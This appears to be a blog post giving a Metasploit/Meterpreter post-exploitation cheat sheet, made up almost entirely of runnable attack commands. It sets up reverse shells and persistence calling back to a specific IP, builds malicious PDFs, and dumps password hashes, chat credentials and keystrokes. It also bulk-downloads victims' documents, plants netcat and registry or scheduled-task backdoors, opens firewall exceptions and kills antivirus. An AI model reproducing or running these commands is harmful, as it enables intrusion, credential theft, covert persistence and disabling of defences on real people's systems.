Cheat sheet of Metasploit... Commands are as follows ..
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set AutoRunScript pathto script you want to autorun after exploit is run set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 exploit -j -z _________________________________________________________________ # file_autopwn rm -Rf /tmp/1 mkdir /tmp/1 rm -Rf ~/.msf3 wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf ./msfconsole db_driver sqlite3 db_create pentest11 setg LHOST 75.139.158.51 setg LPORT 21 setg SRVPORT 21 setg LPORT_WIN32 21 setg INFILENAME /tmp/file3.pdf use auxiliary/server/file_autopwn set OUTPATH /tmp/1 set URIPATH /msf set SSL true set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp setg PAYLOAD windows/meterpreter/reverse_tcp set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 run __________________________________________________________________ # shows all the scripts run [tab] __________________________________________________________________ # persistence! broken ...if you use DNS name .. run persistence -r 75.139.158.51 -p 21 -A -X -i 30 __________________________________________________________________ run get_pidgin_creds idletime sysinfo __________________________________________________________________ # SYSTEM SHELL ( pick a proc that is run by system ) migrate 376 shell __________________________________________________________________ # session hijack tokens use incognito impersonate_token "NT AUTHORITY\\SYSTEM" __________________________________________________________________ # escalate to system use priv getsystem __________________________________________________________________ execute -f cmd.exe -H -c -i -t execute -f cmd.exe -i -t __________________________________________________________________ # list top used apps run prefetchtool -x 20 __________________________________________________________________ # list installed apps run prefetchtool -p __________________________________________________________________ run get_local_subnets __________________________________________________________________ # find and download files run search_dwld "%USERPROFILE%\\my documents" passwd run search_dwld "%USERPROFILE%\\desktop passwd run search_dwld "%USERPROFILE%\\my documents" office run search_dwld "%USERPROFILE%\\desktop" office __________________________________________________________________ # alternate download -r "%USERPROFILE%\\desktop" ~/ download -r "%USERPROFILE%\\my documents" ~/ __________________________________________________________________ # alternate to shell not SYSTEM # execute -f cmd.exe -H -c -i -t __________________________________________________________________ # does some run wmic commands etc run winenum
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080" __________________________________________________________________ # An example of a run of the file to download via tftp of Netcat and then running it as a backdoor. run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 __________________________________________________________________ # vnc / port fwd for linux run vnc __________________________________________________________________ # priv esc run kitrap0d __________________________________________________________________ run getgui __________________________________________________________________ # somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?! run killav run winemun run memdump run screen_unlock __________________________________________________________________ upload /tmp/system32.exe C:\\windows\\system32\\ reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe" reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32 upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\" __________________________________________________________________ getuid ps getpid keyscan_start keyscan_dump migrate 520 portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80" portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666 __________________________________________________________________ shell run myremotefileserver_mserver -h run myremotefileserver_mserver -p 8787 __________________________________________________________________ run msf_bind run msf_bind -p 1975 rev2self getuid __________________________________________________________________ getuid enumdesktops grabdesktop run deploymsf -f framework-3.3-dev.exe run hashdump run metsvc run scraper run checkvm run keylogrecorder run netenum -fl -hl localhostlist.txt -d google.com run netenum -rl -r 10.192.0.50-10.192.0.254 run netenum -st -d google.com run netenum -ps -r 10.192.0.50-254 ___________________________________________________________________ # Windows Login Brute Force Meterpreter Script run winbf -h ___________________________________________________________________ # upload a script or executable and run it uploadexec ___________________________________________________________________ # Using Payload As A Backdoor from a shell REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe" SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011 ___________________________________________________________________ # kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks catchme.exe -K "c:\Program Files\Kaspersky\avp.exe" catchme.exe -E "c:\Program Files\Kaspersky\avp.exe" catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy Cheatsheet by Kislay Bhardwaj. He is a Security Researcher Follow: Facebook , Twitter |
No comments:
Post a Comment